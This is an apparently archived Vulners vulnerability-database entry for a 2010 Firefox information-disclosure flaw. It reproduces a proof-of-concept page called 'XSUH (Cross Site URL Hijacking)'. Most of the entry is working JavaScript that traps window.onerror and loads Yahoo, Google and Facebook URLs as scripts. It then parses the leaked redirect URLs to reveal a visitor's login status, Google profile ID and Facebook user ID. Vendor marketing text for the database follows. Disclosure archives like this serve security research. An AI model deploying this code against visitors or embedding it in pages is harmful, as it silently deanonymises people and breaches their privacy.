Vulners
Lucene search
Mozilla Firefox出错处理信息泄露漏洞
XSUH (Cross Site URL Hijacking) Demo by Soroush Dalili - IRSDL at Yahoo d0t com
<br/>
Tested Platform: This technique has been tested on Mozilla Firefox 3.6.3, 3.5.9, 3.6.4build4.
<br/>
Blog: <a href="http://soroush.secproject.com/blog/">Click Here</a>
<br/>
Mirror Blog: <a href="http://irsdl1.wordpress.com">Click Here</a>
<br/><hr/>
1. Which Version of Yahoo Mail Are You Currently Using: <b><font color="#00FF11"><span id="yahooresult"></span></font></b>
<br/>
2. What Is Your Profile ID in Google.com: <b><font color="#7777FF"><span id="googleresult"></span></font></b>
<br/>
3. What Is Your Facebook User ID If You Play Farmville: <b><font color="#0077FF"><span id="fbresult"></span></font></b>
<br/>
<script>
window.onerror=fnErrorTrap;
function fnErrorTrap(sMsg,sUrl,sLine){
var msg = '';
sUrl = unescape(sUrl);
if(sUrl.indexOf('yahoo')>0) // Yahoo
{
if(sUrl.indexOf('/dc/')>0)
msg = 'You Are Using New Version of Yahoo Mail!';
else if(sUrl.indexOf('/mc/')>0)
msg = 'You Are Using Old Version of Yahoo Mail!';
else
msg = 'You Are Not Logged-in in Yahoo Mail!';
document.getElementById('yahooresult').innerHTML = msg;
}
else if(sUrl.indexOf('google')>0) //Google
{
if(sUrl.indexOf('/ServiceLogin')>0)
msg = 'You Are Not Logged-in in Google.com!';
else if(sUrl.indexOf('/editprofile')>0)
msg = 'You Are Logged-in in Google.com But You Do Not Have Any Profile!';
else if(sUrl.indexOf('/profiles/')>0)
msg = 'Your Profile ID In Google.com Is: '+sUrl.substring(sUrl.lastIndexOf('/')+1);
else
msg = 'You Are Logged-in in Google But I Cannot Find Your Profile ID!!!';
document.getElementById('googleresult').innerHTML = msg;
}else // Facebook
{
if(sUrl.indexOf('login.php')>0)
msg = 'You Are Not Logged-in in Facebook!';
else if(sUrl.indexOf('tos.php')>0)
msg = 'WoW! You Do Not Play Farmville?!!';
else if(sUrl.indexOf('xd_receiver.htm')>0)
{
var temp = sUrl.substring(sUrl.indexOf('uid":'));
msg = 'Your Facebook User ID Is: '+temp.substring(5,temp.indexOf(','));
}
else
msg = 'I Cannot Get The Point!';
document.getElementById('fbresult').innerHTML = msg;
}
return false;
}
if(!(/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent)))
alert('Please use Mozilla Firefox');
else
{
document.write('<script src="http://mail.yahoo.com/"><\/script>');
document.write('<script src="http://www.google.com/profiles/me"><\/script>');
document.write('<script src="http://www.facebook.com/login.php?return_session=1&nochrome=1&fbconnect=1&extern=2&display=popup&api_key=80c6ec6628efd9a465dd223190a65bbc&v=1.0&next=http://www.farmville.com/xd_receiver.htm"><\/script>');
}
</script>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 May 2010 00:00Current
6.9Medium risk
Vulners AI Score6.9